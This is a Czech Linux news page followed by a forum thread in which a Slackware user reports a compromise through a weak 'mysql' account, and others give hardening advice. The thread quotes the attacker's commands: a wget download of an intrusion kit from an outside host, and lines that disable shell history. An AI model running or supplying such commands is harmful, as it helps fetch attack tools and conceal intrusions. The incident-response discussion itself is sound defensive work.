Byla vydána (𝕏) nová verze 24.7 open source firewallové a routovací platformy OPNsense (Wikipedie). Jedná se o fork pfSense postavený na FreeBSD. Kódový název OPNsense 24.7 je Thriving Tiger. Přehled novinek v příspěvku na fóru.
Binarly REsearch upozorňuje na bezpečnostní problém PKFail (YouTube) v ekosystému UEFI. Stovky modelů zařízení používají pro Secure Boot testovací Platform Key vygenerovaný American Megatrends International (AMI) a jeho privátní část byla při úniku dat prozrazena. Do milionů zařízení (seznam v pdf) po celém světě tak útočníci mohou do Secure Bootu vložit podepsaný malware. Otestovat firmware si lze na stránce pk.fail. Ukázka PoC na Linuxu na Windows na YouTube.
Mobilní operační systém /e/OS (Wikipedie) založený na Androidu / LineageOS, ale bez aplikací a služeb od Googlu, byl vydán ve verzi 2.2 (Mastodon, 𝕏). Přehled novinek na GitLabu. Vypíchnuta je rodičovská kontrola.
Společnost OpenAI představila vyhledávač SearchGPT propojující OpenAI modely umělé inteligence a informace z webů v reálném čase. Zatím jako prototyp pro vybrané uživatele. Zapsat se lze do pořadníku čekatelů.
Distribuce Linux Mint 22 „Wilma“ byla vydána. Je založená na Ubuntu 24.04 LTS, ale s desktopovým prostředím Cinnamon (aktuálně verze 6.2), příp. MATE nebo Xfce, balíkem aplikací XApp, integrací balíčků Flatpak a dalšími změnami. Více v přehledu novinek a poznámkách k vydání.
Příspěvek na blogu Truffle Security: Kdokoli může přistupovat ke smazaným a privátním repozitářům na GitHubu.
Byla vydána nová verze 14 integrovaného vývojového prostředí (IDE) Qt Creator. Podrobný přehled novinek v cgitu. Vypíchnout lze podporu rozšíření v Lua.
Byla vydána verze 1.80.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.
Apple oznámil, že v beta verzi spustil své Apple Maps na webu. Podporován je také webový prohlížeč Chrome. Ne však na Linuxu.
Portál Stack Overflow po roce opět vyzpovídal své uživatele, jedná se především o vývojáře softwaru, a zveřejnil detailní výsledky průzkumu. Průzkumu se letos zúčastnilo více než 65 tisíc vývojářů. Z Česka jich bylo 710. Ze Slovenska 246.
Používám Slackware 10.0.
Jádro distribuční s jedinou drobnou úpravou.
Většina software pochází z distribučních balíčků, ale mám i nějaké kompilované ze zdrojových kódů a předkompilované z http://linuxpackages.net/.
Včera večer jsem pracoval na počítači a zůstal jsem připojený k internetu i přes to, že jsem nic nestahoval ani nikde nebrouzdal. Mám externí modem, a tak slyším každý přenos dat. Asi po hodině ticha najednou začal modem pracovat (typické skřípění, nebo šumění z reproduktoru modemu). Když jsem si toho po chvíli všiml, začal jsem pátrat po tom, co je tomu příčinou. Nejprve mě napadl poštovní klient, ale nebyl spuštěný. Spustil jsem tcpdump a odchytil nějaké spojení na adresu http://sigma.hostingfacile.net/. Dalším krokem bylo spuštění ps aux kde jsem ve výpisu našel přihlášeného uživatele mysql. Vzhledem k tomu, že počítač využívám sám a MySql jako službu mám vypnutou, byla pro mě návštěva uživatele mysql opravdovým překvapením. Při dalším výpisu ps aux už na mě "vybafl" uživatel mysql připojený hned několikrát. A co víc! Jeden z jeho procesů byl wget -c http://sufletl.home.ro/psy.tgz. A to byl právě ten okamžik, kdy jsem s velkou silou vytrhl kabel z modemu.
Po odpojení jsem chvíli přemýšlel a vydal jsem se na průzkum napáchaných škod. Nejprve do /etc/passwd, kde jsem objevil toto:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bashMyslím, že by tam neměl být ten shell, ale jistý si nejsem.
Přihlásil jsem se jako uživatel mysql a hledal v domovském adresáři /var/lib/mysql soubor .bash_history, ale kromě mých databází tam nic nebylo. Že by něco takového?:
unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null
Smazal jsem uživatele mysql a připojil k internetu a za neustálého kontrolování přenosu jsem stáhl inkriminovaný soubor psy.tgz. Myslel jsem, kdovíco najdu, ale jde o celkem běžný soft. Trochu googlu a našel jsem tohle. Po přečtení reakcí jsem narazil na exploit, ale z toho nejsem dvakrát moudrý.
Taky jsem proběhl všechny tmp adresáře a ve /var/tmp/ jsme objevil adresář .bash, který odpovídá obsahu psy.tgz. Je s podivem, že tam byl celý když jsem viděl jak se stahuje... leda bych připojení ukončil těsně po stažení.
Otázky zní:
Jak získal útočník přístup do mého počítače?
Jak tomu napříště zabránit?
Jaké kroky podniknout?
Stala by se to, i kdybych použil pouze distribuční software - chyba v zabezpečení software třetích stran?
Co jsem zanedbal?
Jak jsou na tom jiné distribuce? Mandrake?
Co si o tom myslíte?
Jistě je pravdou, že správný administrátor systému by situaci neměl nechat dojít až do tohoto stavu a měl by ji předcházet. Především pravidelnou aktualizací a bezpečnostními záplatami. Stalo se.
Připojuji se teď k internetu s velkou opatrností, spouštím okamžitě tcpdump a neustále kontroluji spuštěné procesy. A to rozhodně není nic příjemného. Budu rád, podělíte-li se se mnou o své zkušenosti, nápady a rady.
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
ten zbytok je fakt divny
Domain name: hostingfacile.net Registrant Contact: Eurologon S.r.l. Enzo Baiotto (domains@eurologon.com) +39.0119473512 Fax: +39 011 9409691 Via Roma 30 Trofarello, TO 10028 IT Administrative Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Billing Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Technical Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Status: Locked Name Servers: ns1.hostingfacile.net ns2.hostingfacile.net Creation date: 18 Apr 2002 16:38:18 Expiration date: 18 Apr 2006 16:38:18
ori.. bash export PATH="." httpd exit port-ul bouncerului este 50001 .. #HackTeam rullez...!No, spust si tam chkrootkit a rkhunter a uvidis sam...
Apache 1.3.31 [ Vulnerable ] PHP 4.3.7 [ Vulnerable ] Checking for allowed protocols... [ Warning (SSH v1 allowed) ]To jsem opravil...
Ano, používám jádro 2.4.x.
Stínová hesla - shadowing používám.
Iptables jsem nastavil takhle, snad to jako základ stačí:
iptables -P INPUT DROP iptables -P OUTPUT ACCEPT iptables -P FORWARD DROP iptables -A INPUT -i ! ppp+ -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -j LOG --log-prefix "INPUT drop: "Tripwire jsem naistaloval, ale něco je špatně:
Please enter your local passphrase: Parsing policy file: /etc/tripwire/tw.pol Generating the database... *** Processing Unix File System *** Software interrupt forced exit: Segmentation FaultVerze Tripwire:
Tripwire(R) 2.3.0.47 for LinuxNerozumím co znamená "povýšení práv".
SSH potřebuji. Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root? Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo. Telnet zapnutý nemám.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.
Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo.Je to Vas nazor, nebudu Vam ho brat. Muzete ale zarucit, ze vsechny nezamcene ucty na tom pocitaci budou mit dostatecne silna hesla?
Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root?Da se nastavit, ze
su root
muze pouzit pouze pokud ucet, ze ktereho tak cini, je ve skupine wheel. A treba ucet, pod kterym se utocnik prihlasi, ve wheel nebude.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.Podle me ano (predpokladam, ze conntrack pouzivate, jinak RELATED tam je zbytecne). Jedna poznamka, lepsi nez:
iptables -A INPUT -i ! ppp+ -j ACCEPTje:
iptables -A INPUT -i lo -j ACCEPTProc povolovat pristup ze vsech rozhrani krome ppp, kdyz ve skutecnosti jedine co potrebujete je pristup z lo? I pokud tam mate eth rozhrani pripojene k siti, ktere duverujete, je vzdy lepsi to uvest explicitne nez povolovat pausalne.
Chyba byla nejspíš právě ve slabém hesle uživatele mysql a ta se mohla stát na kterékoliv distribuci. Rozhodně neinstaluji a nespouštím každou kravinu, právě naopak, snažím se minimalizovat instalovaný software.
Přestože problém nebyl zapříčiněn chybou, která mohla být zazáplatována, budu teď ale sledovat adresář patches pečlivěji. Po průniku do neopatchovného systému by měl rozhodně útočník jednodušší prácí např. s výběrem exploitu.
Jádra 2.4.x patří "bezpečnějším" vzhledem k jejich konzervativnímu přístupu k zařazování nových fičurek.
Zřejmě jsem se nechal příjemně ukolébat představou bezpečnosti a nevěnoval jsem ji takovou pozornost jakou by si zasloužila.
Tiskni
Sdílej: